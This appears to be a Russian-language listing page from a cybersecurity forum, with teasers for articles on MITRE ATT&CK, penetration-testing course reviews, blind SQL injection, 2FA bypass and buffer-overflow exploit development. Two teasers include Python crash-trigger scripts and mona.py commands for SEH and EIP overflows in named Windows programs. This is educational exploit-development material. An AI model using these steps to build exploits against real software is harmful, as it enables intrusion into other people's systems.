Кибербезопасность

По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.

Статья Обзор матрицы MITTRE ATT&CK

  • 7 812
  • 4
Приветствую участников форума!

Понимаю, что большинство присутствующих здесь знакомы с матрицей атак MITTRE ATT&CK и, может даже, пользуются ею, но эта статья должна помочь новичкам. Практика объяснения и написания статей, будет не лишней.

Матрица ATT&CK является известной методологией для классификации техник злоумышленника. Короче говоря, в 2013 году ребята собрались и классифицировали поведение злоумышленника. Оказалось, что вариантов атаки не так уж и много.

Матрица представлена в 2-х вариациях: Enterprise

1641572332151.png


и Mobile

1641572380895.png


Матрица обладает огромным потенциалом в качестве помощника любому специалисту по безопасности, но вот пользоваться ей в начале не так то и удобно. Это как c таблицей тригонометрических функций. Сначала вы тратите много времени на поиск нужной формулы и значения, но с каждым использованием вы делаете это все быстрее и быстрее.

Поэтому, кажется, новичкам стоило бы начинать путь с нее, если только вы...

Отзыв на курс «SQL-injection Master»

  • 6 975
  • 2
Всех приветствую!

Новогодние праздники подходят к концу, салаты съедены, напитки выпиты и появилось свободное время для написания отзыва о курсе.

Happy-New-Year-Memes..jpeg
Введение

Если вы читали мой предыдущий отзыв о курсе WAPT, то моей основной целью прохождения курса было подтягивание навыков эксплуатации SQL-уязвимостей. Все остальные знания, полученные во время прохождения курса, были для меня крайне полезным бонусом. В WAPT тема SQL-инъекций рассматривалась хорошо, были качественные лабораторные задания, и мне удалось немного подтянуть свои навыки, отработать навыки эксплуатации, но, когда я узнал о появлении специализированно курса по SQL-инъекциям, я, не раздумывая, записался на него.

Курс полностью был подготовлен @explorer , и работа была проведена титаническая. Курс состоит из методических материалов (PDF + видео + php-файлы для отработки на локальной машине) и доступа к лаборатории. В методических материалах крайне доступно рассказывается о работе принципах работы СУБД, SQL-запросах, а также - как и почему...

КАК Я ПРОХОЖУ КУРС WAPT (КВЕСТ В РЕАЛЬНОМ ВРЕМЕНИ) – ЧАСТЬ 2

  • 6 460
  • 5
WAPT.png


Приветствую участников форума Codeby.net!

Продолжаю свое повествование о том, как я прохожу обучение на курсах Web Application Penetration Testing (WAPT) от команды Codeby. Для тех, кто не читал первую часть, перейдите по ссылке: КАК Я ПРОХОЖУ КУРС WAPT (КВЕСТ В РЕАЛЬНОМ ВРЕМЕНИ)

После прошлой статьи и ряда негативных отзывов в свой адрес я долго думал продолжать или нет. Решил продолжить. Хочу сразу предупредить любителей писать отзывы, которые даже не читали статью – не поленитесь, прочитайте, а потом критикуйте. Я не собираюсь кого-либо оскорблять, пытаться опорочить сам курс или еще каким-то способом нанести информационный вред Codeby. Повторюсь, я высказываю свою точку зрения, показываю, как положительные, так и отрицательные моменты, чтобы люди, которые пойдут учиться знали, к чему им готовиться и рассчитывали свои силы. В таком случае не будет отзывов типа: «Я заплатил деньги, учите меня», при этом человек не обладает элементарными знаниями. В...​

Статья Автоматизация эксплуатации слепой инъекции при помощи Burp Suite

  • 9 753
  • 10
Привет всем!

На написание этой статьи меня сподвигло обучение на курсах WAPT от Codeby. Получилось так, что по условиям обучения, не приветствуется использование любых сканеров уязвимостей или автоматических средств их эксплуатации (sqlmap, tplmap и др.). На экзамене это будет строжайше запрещено. Организаторы настроены научить нас эксплуатировать все уязвимости вручную (ну или почти вручную). Не возбраняется использование только программы Burp Suite или самописных скриптов на, например, Python или Bash. К моему глубочайшему сожалению, я не могу похвастаться профессиональным или хотя бы приемлемым владением данных языков.

Поэтому при решении задач по SQL-инъекциям, где они были слепые, мне приходилось рассчитывать на программу Burp Suite и собственную зад...цу (которую приходилось отсиживать в процессе извлечении информации из базы данных (БД). Все дело в том, что слепая SQL-инъекция (Blind SQL-injection) это такой вид уязвимости, при котором нельзя увидеть ответы ошибок на странице и соответственно потом вывести информацию из БД в уязвимые поля. При таком типе инъекций мы можем только наблюдать реакцию...​

SQLIM лаборатория 90 дней - старт 3 января

  • 4 478
  • 0
Доступ к лаборатории курса SQLIM и лицензирование

Стоимость доступа к лаборатории на 90 дней 6000 рублей

Записаться

Со второго потока курса, мы решили открыть платный доступ к лаборатории курса «SQL-injection Master». Это позволит сэкономить средства, а также оценить свой уровень подготовки.
  • Лаборатория состоит из 68 заданий разной сложности, и 10 заданий экзамена.
  • Все сдавшие экзамен, вне зависимости от того была ли это покупка полного курса, или только доступа к лаборатории, получают бонусную методичку и сертификат.
Для кого такой подход может быть интересен:
  • Если вы уже имеете серьёзный опыт раскрутки SQLi, и хотите получить незабываемое приключение при прохождении тасков.
  • Если вы считаете, что имеете большой опыт раскрутки SQLi, хотите проверить свои навыки, и сделать вывод - стоит ли записаться на полный курс.
  • Если вы прошли уже курс «SQL-injection Master», но не смогли прорешать все задания.
  • Если вы прошли курс...

Статья Easy File Sharing Web Server 7.2 SEH overflow

  • 3 154
  • 0
Тестирование проводилось на Windows XP SP3 x86 En (no dep)

Уязвимое ПО: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe

Запускаем ПО

1640554135976.png


И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import pack
import socket
payload = "A"*5000

exploit = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exploit.connect(("127.0.0.1",80))
exploit.send("GET " + payload + " HTTP/1.1\r\n")
exploit.close()

1640554171427.png


посмотрим Chain SEH

1640554187682.png


Сгенерирум строку паттерн используя плагин mona.py

!mona pc 50000

1640554203618.png


Скопируем сгенерированную строку ASCII строку в наш триггер сплойт. Перезапустим сервер, приаттачимся, и запустим сплойт.

После чего пишем в строке команд отладчика

!mona findmsp

Чтобы выполнить циклический поиск по патернам, сгенерированной нами ASCII строки. Mona будет...

WAPT от лица студента

  • 3 817
  • 1
Привет, Codeby! Хочу немного рассказать о своем опыте прохождения курса.

Я сам студент скромного беларусского вуза, учусь на схемотехника и немного играю в CTF. До попадания на курс имелся небольшой опыт пентеста, в основном полученный на HTB и аналогичных площадках. На курс WAPT я попал после The Standoff, когда Codeby заметили нашу команду Bulba Hackers на 5 месте и помогли получить курс бедным студентам =)

К курсу в самом начале я относился не очень серьезно, даже не открывал методички и не смотрел видео, думая, что там не будет для меня новой информации, но потом я все же нашел для себя много нового, об этом расскажу дальше.

Пассив

После получения впн конфига я сразу же пошел смотреть таски. Первые несколько задач решались довольно быстро, кроме задачи с нахождением реального IP, в этом таске я мучительно пытался сабмитать IP и локацию серверов CDN от CF и даже одного сервера, который светился в Censys, но все они не подходили, все же в один момент мой флаг приняли и я перешел к следующим таскам. Из этого раздела еще запомнился последний таск с пойском сайта игры. Многие стонали от него, но этот таск мне запомнится на долго, хоть он и сдался за...

Статья VUPlayer 2.49 .wax vanilla EIP overflow

  • 2 736
  • 0
Тестрирование проводилось на ОС Windows 7 x32 с отключенным DEP.

Создадим эксплойт триггер чтобы перезаписать регистр EIP.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

payload = "A"*5000

file = open('exploit.wax', 'w')
print "Create file exploit"
file.write(payload)
print "Write payload"

Запускаем Vuplayer под отладчиком

1640552858368.png


и скармливаем наш файловый сплойт.

1640552874728.png


Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py

!mona pc 5000

1640552891943.png


Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…

1640552907739.png


Как мы видим выполнение программы остановилось. Смотрим на значение регистра EIP, зачем копируем это значение 68423768 для вычисления смещения.

Пишем в панели команд

!mona po 68423768

1640552927331.png
...

КАК Я ПРОХОЖУ КУРС WAPT (КВЕСТ В РЕАЛЬНОМ ВРЕМЕНИ)

  • 10 632
  • 19
ПРИВЕТСТВУЮ, ФОРУМЧАНЕ!!

111111.jpg

Решил присесть за перо, чтобы поделиться своим опытом обучения на курсах WAPT от Cobeby. Я не первый и надеюсь не последний, но я сразу поставил себе задачу написать честный и объективный отзыв без приукрас и приуменьшений. Сразу скажу, я не являюсь членом команды Codeby и не ставлю целью разрекламировать курс для привлечения людей, я просто хочу поделиться своими мыслями - как позитивными, так и негативными.

Сегодня 22 декабря 2021 года, я учусь с 8 декабря и начал писать отзыв сейчас, чтобы просто не забыть все аспекты. В процессе написания, я не буду ничего менять, как бы не изменилось мое отношение ко всему происходящему. Хочу сразу предупредить, что в ходе моего повествования не будет никакого раскрытия решений заданий - в этой среде это не приветствуется. Насколько я помню, даже мэтры, которые пишут гайды по прохождению задач с различных площадок CTF никогда полностью не раскрывают всех мелочей. Без подобной философии не будет прогресса в образовании.

И так, поехали.

ПРЕДЫСТОРИЯ.

Всю свою жизнь я...​

Статья Обход 2FA и методы захвата аккаунта: исследование уязвимостей

  • 9 740
  • 11
2fa (1).jpg

Дисклеймер

Вся представленная информация размещена исключительно в образовательных и исследовательских целях. Автор не рекомендует использовать полученные знания для взлома, нанесения вреда или ущерба. Будьте благоразумны и не нарушайте законы.

Резюме

Различные приложения уже давно слились с нашей повседневностью. В них наши персональные,банковские,личные и другие данные, и их утечка может обойтись очень дорого.

В этой статье я затрону насколько плохим может быть отношение к безопасности на примере довольно крупной компании в СНГ по доставке азиатской пищи. Пытаюсь зарепортить уязвимости. Описываю доказательство концепции. Надеюсь, статья будет интересна для вас.


Введение

Двухфакторная авторизация была придумана для дополнительной безопасности, и помимо стандартного ввода логина и пароля предполагает так же и ввод дополнительного элемента: код из...
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Статистика форума

Темы
51 042
Сообщения
344 837
Пользователи
148 593
Новый пользователь
woohoo